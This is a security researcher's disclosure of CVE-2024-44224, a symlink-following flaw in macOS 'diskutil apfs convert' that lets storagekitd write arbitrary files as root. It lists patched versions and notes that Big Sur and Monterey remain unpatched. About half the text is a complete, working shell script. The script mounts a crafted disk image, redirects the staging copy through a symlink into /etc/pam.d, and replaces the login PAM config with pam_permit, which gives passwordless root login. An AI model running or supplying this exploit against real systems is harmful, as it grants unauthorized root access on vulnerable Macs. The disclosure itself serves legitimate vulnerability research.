Before actually converting from HFS+, diskutil apfs convert puts legacy boot files in a "staging" folder passed with -prebootSource. The copying is done by storagekitd (as root), and it follows symlinks, allowing arbitrary file write. This can easily escalate privileges.
After reporting the bug in September 2024, I received an Apple Security Bounty, and it was fixed in macOS 13.7.2, macOS 14.7.2, and macOS 15.2:
Impact: A malicious app may be able to gain root privileges
Description: A permissions issue was addressed with additional restrictions.
CVE-2024-44224: Amy (@asentientbot)
Big Sur and Monterey are still vulnerable.
Once again, emma (916253) and ASentientHedgehog helped test.
They're also really cool in general, please go follow them.
The following shell script will login as root on affected versions.
wholeDevice=$(hdiutil attach -nomount -plist ram://10000000 | plutil -extract system-entities.0.dev-entry raw -)
mainName=$(mktemp -u evilXXXXX)
bootName=$(mktemp -u bootXXXXX)
diskutil partitiondisk $wholeDevice gpt jhfs+ $mainName 1g %Apple_Boot% %noformat% r
newfs_hfs -v $bootName ${wholeDevice}s3
diskutil mount ${wholeDevice}s3
bugInput=/Volumes/$bootName/com.apple.boot.R/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations
bugOutput=/Volumes/$mainName/staging/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations
mkdir -p $bugInput
mkdir -p $(dirname $bugOutput)
echo 'auth sufficient pam_permit.so
account sufficient pam_permit.so
session sufficient pam_permit.so' > $bugInput/login
ln -s /etc/pam.d $bugOutput
diskutil apfs convert $mainName -prebootSource /Volumes/$mainName/staging
login root